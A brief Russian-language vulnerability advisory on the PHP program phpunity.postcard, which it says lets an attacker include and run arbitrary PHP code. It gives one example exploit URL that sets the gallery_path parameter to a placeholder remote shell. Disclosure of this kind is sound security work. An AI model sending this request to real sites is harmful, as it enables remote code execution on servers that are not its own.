Рекомендуем почитать:


Пентест WEB: практический курс для начинающих
Программа: phpunity.postcard
Злоумышленник может включить и выполнить произвольный PHP код.
Пример:
http://[target]/phpunity-postcard.php?plgallery_epost=1&gallery_path=[shell]?